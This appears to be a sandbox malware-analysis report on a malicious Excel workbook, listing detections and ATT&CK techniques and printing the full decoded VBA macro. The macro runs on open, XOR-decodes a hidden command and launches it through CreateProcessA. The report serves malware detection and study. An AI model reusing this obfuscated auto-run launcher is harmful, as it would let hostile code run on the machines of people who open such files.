MALICIOUS
156
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains both Excel 4.0 (XLM) macros and VBA macros, with specific firings for OLE_XLM_AUTOOPEN, OLE_VBA_MACROS, OLE_VBA_DOCOPEN, and OLE_VBA_WBOPEN. The presence of a CreateProcess API reference and the ClamAV detection signature 'Xls.Malware.Valyria-9756492-0' strongly indicate malicious intent, likely involving the execution of a secondary payload. The macros are designed to run automatically upon opening the document.
Heuristics 6
-
ClamAV: Xls.Malware.Valyria-9756492-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-9756492-0
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() KP_G -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Function Sub Workbook_Open() Document_Open
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 352ef780fe28bd5ff23a3746b4c014592cf18e817485f0403fde5997d9d0ca4f |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Macro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6134 bytes |
SHA-256: ff3c3627303aa5770e1180ce3959beb52547feb0b907cfdedd31d8475c8907ab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Type T_MIK
WF_I As Long
FPQ_X As LongPtr
XS_I As Long
End Type
Private Type LRB_ZB
DV_OA As LongPtr
LL_L As LongPtr
M_ZH As Long
I_P As Long
End Type
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal DU_G As Long, ByVal LGK_BPN As String, CZ_X As Any, LK_OFM As Any, ByVal C_E As Long, ByVal LP_RU As Long, ByVal J_CP As Any, ByVal FB_BVQ As Long, K_DGR As Q_MVO, ESO_TF As LRB_ZB) As LongPtr
Private Type Q_MVO
HX_G As Long
D_K As String
SV_PJ As String
LR_AAS As String
KB_J As Long
XN_HZ As Long
MBZ_UB As Long
SHA_A As Long
HBT_M As Long
V_VQ As Long
UA_ESV As Long
M_M As Long
Q_ZT As Integer
N_X As Integer
D_K2 As LongPtr
CV_OWG As LongPtr
O_IL As LongPtr
V_XGP As LongPtr
End Type
#Else
Private Type LRB_ZB
DV_OA As Long
LL_L As Long
M_ZH As Long
I_P As Long
End Type
Private Type Q_MVO
HX_G As Long
D_K As String
SV_PJ As String
LR_AAS As String
KB_J As Long
XN_HZ As Long
MBZ_UB As Long
SHA_A As Long
HBT_M As Long
V_VQ As Long
UA_ESV As Long
M_M As Long
Q_ZT As Integer
N_X As Integer
D_K2 As Long
CV_OWG As Long
O_IL As Long
V_XGP As Long
End Type
Private Declare Function CreateProcessA Lib "Kernel32" (ByVal DU_G As Long, ByVal LGK_BPN As String, CZ_X As T_MIK, LK_OFM As T_MIK, ByVal C_E As Long, ByVal LP_RU As Long, ByVal J_CP As Long, ByVal FB_BVQ As Long, K_DGR As Q_MVO, ESO_TF As LRB_ZB) As Long
Private Type T_MIK
WF_I As Long
FPQ_X As Long
XS_I As Long
End Type
#End If
Public Function DZ_E(ByVal L_NY As String)
Dim CSR_E As T_MIK
Dim LLS_N As T_MIK
Dim DCD_NC As Long
DCD_NC = &H20&
#If VBA7 Then
Dim Z_BDW As LongPtr
#Else
Dim Z_BDW As Long
#End If
Dim UCU_DAD As Q_MVO
UCU_DAD.HX_G = LenB(UCU_DAD)
UCU_DAD.M_M = &H1&
UCU_DAD.Q_ZT = 0
CSR_E.WF_I = LenB(CSR_E)
LLS_N.WF_I = LenB(LLS_N)
Dim K_SL As LRB_ZB
DZ_E = CreateProcessA(0&, L_NY, CSR_E, LLS_N, False, DCD_NC, Z_BDW, 0&, UCU_DAD, K_SL)
End Function
Public Sub KP_G()
Dim G_BZD As String
G_BZD = "3a29322e262b2c31342774273"
Dim N_F As String
N_F = "53c6d6511242c2b37281b3937"
Dim A_PWQ As String
A_PWQ = "2f267700382120242376683a2"
Dim ZAJ_V As String
ZAJ_V = "e3824203e2e2033740d256d6a"
Dim FSH_G As String
FSH_G = "22222a3d683e39273071756c2"
Dim D_BG As String
D_BG = "824307f0a040800150c0a7a69"
Dim ZF_S As String
ZF_S = "6d7e112422226c2a203a6f646"
Dim Z_O As String
Z_O = "e381132253e33216c04222039"
Dim AS_F As String
AS_F = "6168722a363176170414070c1"
Dim BBC_TXH As String
BBC_TXH = "61767726962123437377f3030"
Dim HP_RU As String
HP_RU = "286d3b7e6b70362123086b676"
Dim M_O As String
M_O = "2033c3a65092f282a3b2b681e"
Dim T_QR As String
T_QR = "37303732257f0b21356301203"
Dim BV_F As String
BV_F = "602243f2a36337776702a263a"
Dim DX_JC As String
DX_JC = "12780f3c28212b2a200376003"
Dim EZ_Z As String
EZ_Z = "b28386b042c31363073056b67"
Dim I_N As String
I_N = "626a3a222523603620353a6f7"
Dim KJL_B As String
KJL_B = "66e672d323f016b002e3a3829"
Dim P_NO As String
P_NO = "3b202c1026342264713c30373"
Dim HK_AW As String
HK_AW = "d316c68763e32397630392830"
Dim SQI_CZ As String
SQI_CZ = "26282229363f7a3b2b3977653"
Dim JX_AP As String
JX_AP = "72327363f670320202a2a3227"
Dim KJC_FSJ As String
KJC_FSJ = "232b3a6d32303462686169332"
Dim DON_ZV As String
DON_ZV = "b227b09061f1c061817746f63"
Dim EU_ZC As String
EU_ZC = "6a1e3a23366720363d74716a7"
Dim QO_N As String
QO_N = "560032f316804363221372c6b"
Dim KW_EQP As String
KW_EQP = "772122346d1b2e282e23761e3"
Dim QEH_R As String
QEH_R = "83d222a20363c382a2a686305"
Dim I_VO As String
I_VO = "2d312d2413373d243922316c6"
Dim U_CDD As String
U_CDD = "7282c207d1819150a19071971"
Dim C_AMH As String
C_AMH = "7e686a162a21247a3d3c317f6"
Dim VXF_IMC As String
VXF_IMC = "261621e2d22386b1d30203b3a"
Dim XYO_QD As String
XYO_QD = "3b3e6e6e0a336875152d256d7b033b332b33"
Dim FZO_WN As String
FZO_WN = N_TJB("JFEKTXDTXKZBMYMHFMBOX_HMNCCWHQEDAMVETAHVOXGLVTDCMBVGYIENXSXQUHM", G_BZD & N_F & A_PWQ & ZAJ_V & FSH_G & D_BG & ZF_S & Z_O & AS_F & BBC_TXH & HP_RU & M_O & T_QR & BV_F & DX_JC & EZ_Z & I_N & KJL_B & P_NO & HK_AW & SQI_CZ & JX_AP & KJC_FSJ & DON_ZV & EU_ZC & QO_N & KW_EQP & QEH_R & I_VO & U_CDD & C_AMH & VXF_IMC & XYO_QD)
End Sub
Public Sub Document_Open()
KP_G
End Sub
Function JE_YTG(ByVal HX_G As Integer, ByVal XN_HZ As Integer)
JE_YTG = HX_G Xor XN_HZ
End Function
Function VRL_VJI(ByVal OFC_PJ As String, ByVal BMG_TI As String)
VRL_VJI = Mid$(OFC_PJ, BMG_TI, 1)
End Function
Sub Workbook_Open()
Document_Open
End Sub
Public Function N_TJB(F_VS As String, AW_VK As String) As String
Dim MBS_WXU As Long
Dim MB_KON As String
Dim S_LES As Long
S_LES = 1
Dim I_IO As String
Dim FM_B As Integer, HI_ITQ As Integer, BMG_TI As Long
For MBS_WXU = 1 To Len(AW_VK) Step 2
MB_KON = ChrW(CByte(Chr(38) & Chr(104) & Mid$(AW_VK, MBS_WXU, 2)))
BMG_TI = S_LES Mod Len(F_VS)
If BMG_TI = 0 Then BMG_TI = Len(F_VS)
FM_B = Asc(MB_KON)
HI_ITQ = Asc(VRL_VJI(F_VS, BMG_TI))
I_IO = I_IO + Chr(JE_YTG(FM_B, HI_ITQ))
S_LES = S_LES + 1
Next
DZ_E (I_IO)
N_TJB = I_IO
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.